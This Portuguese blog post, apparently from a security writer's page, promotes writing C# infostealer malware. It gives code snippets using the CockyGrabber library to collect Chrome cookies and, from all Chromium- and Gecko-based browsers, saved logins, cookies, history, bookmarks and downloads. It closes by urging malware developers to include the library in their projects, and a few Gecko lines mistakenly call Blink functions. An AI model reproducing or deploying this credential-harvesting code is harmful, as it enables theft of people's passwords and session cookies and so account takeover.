carlosadrianosj
carlosadrianosj
Malware Development, C#, capturando informações do navegador de forma simples!
2
0

Malware Development, C#, capturando informações do navegador de forma simples!

Já demonstrei s utilização de linguagens como C e Python aqui para desenvolver malwares, mas até o devido momento, nada sobre C#.

Carlos Adriano de Souza Jorge
2 min
2
0

Já demonstrei a utilização de linguagens como C e Python aqui para desenvolver malwares, mas até o devido momento, nada sobre C#.

C# é uma linguagem de programação, multiparadigma, de tipagem forte, desenvolvida pela Microsoft como parte da plataforma .NET. A sua sintaxe orientada a objetos foi baseada no C++ mas inclui muitas influências de outras linguagens de programação, como Object Pascal e, principalmente, Java. E particularmente, minha linguagem preferida!

C# trás o melhor de vários mundos, a facilidade de desenvolver grandes aplicações de forma coesa e escalável, e a oportunidade de estar lidando com uma linguagem que consegue ter bastante interação com o sistema operacional Windows!

mas porque decidi trazer um artigo abordando o tema que coloquei no titulo? simples, porque recentemente eu fiz uma análise de um Infostealer em C# que capturava inúmeras informações do navegador, você pode ter acesso a esse artigo aqui!

tá, mas o que esse malware utilizava que outros não se apropriavam? bem, recentemente foi disponibilizado o acesso publico a uma biblioteca para C# muito interessante e que pode ser acessada aqui! O desenvolvedor desta biblioteca tinha como principal foco simplificar a coleta de informações do navegador, como cookies, logins e muito mais. facilitando a captura destas informações sem nenhum conhecimento especial sobre navegadores.

E não demorou muito para que a mesma fosse utilizada dentro de malwares com ênfase no roubo deste tipo de informação!

Como já citado a biblioteca é de fácil uso, por exemplo, para capturar cookies do Chrome é apenas necessário que o código abaixo seja inserido no malware:


          

            ChromeGrabber grabber = new ChromeGrabber(); // Cria Grabber 
          
          

            var cookies = grabber.GetCookies(); // Colete todos os cookies com GetCookies() 
          
          

            
          
          

            // Imprima o nome do host, o nome e o valor de cada cookie:
          
          

            foreach (Blink.Cookie cookie in cookies) // O Chrome é baseado em Blink então ele usa Blink.Cookie
          
          

            {
          
          

                string cookieHostname = cookie.HostKey;
          
          

                string cookieName = cookie.Name;
          
          

                string cookieValue = cookie.EncryptedValue;
          
          

                Console.WriteLine($"{cookieHostname}: {cookieName} = {cookieValue}");
          
          

            }

A biblioteca não se prende a navegadores baseados no Chromium, o CockyGrabber possui uma função universal que pode ser usado para pegar cookies, logins e outros dados de vários navegadores. abaixo encontrasse outro exemplo, desta vez  demostrando como pegar informações de todos os navegadores baseados em Chromium/Blink e Gecko:

Chromium/Blink:


          

            UniversalGrabber grabber = new UniversalGrabber(); // Cria Grabber
          
          

            
          
          

            var cookies = grabber.GetAllBlinkCookies(); // Colete os cookies de todos os navegadores baseados em Chromium/Blink
          
          

            var logins = grabber.GetAllBlinkLogins(); // Colete os Logins de todos os navegadores baseados em Chromium/Blink
          
          

            var bookmarks = grabber.GetAllBlinkBookmarks(); // Colete os favoritos de todos os navegadores baseados em Chromium/Blink 
          
          

            var history = grabber.GetAllBlinkHistory(); // Colete o histórico de todos os navegadores baseados em Chromium/Blink
          
          

            var downloads = grabber.GetAllBlinkDownloads(); // Colete os downloads de todos os navegadores baseados em Chromium/Blink

Gecko:


          

            UniversalGrabber grabber = new UniversalGrabber(); // Cria Grabber
          
          

            
          
          

            var cookies = grabber.GetAllGeckoCookies(); // Colete os cookies de todos os navegadores baseados em Gecko
          
          

            var logins = grabber.GetAllGeckoLogins(); // Colete os Logins de todos os navegadores baseados em Gecko 
          
          

            var bookmarks = grabber.GetAllBlinkBookmarks(); // Colete os favoritos de todos os navegadores baseados em Gecko 
          
          

            var history = grabber.GetAllGeckoHistory(); // Colete o histórico de todos os navegadores baseados em Gecko 
          
          

            var downloads = grabber.GetAllBlinkDownloads(); // Colete os downloads de todos os navegadores baseados em Gecko

Por hoje é só, se você está desenvolvendo malwares em C#, está biblioteca não pode faltar em seu projeto, use com sabedoria, nos vemos no próximo artigo! 

#malware #reverseengineer #malwaredev #devmalware #CTI #cti #cyberthreatintelligence #killchain #mitre #malwarereverseengineer #cyberintelligence #sigma #yara #security #cybersecurity #cybercrime #C #C++ #python #dev #offensivesecurity #defensivesecurity #blueteam #redteam #purpleteam

Learn
Support
More Options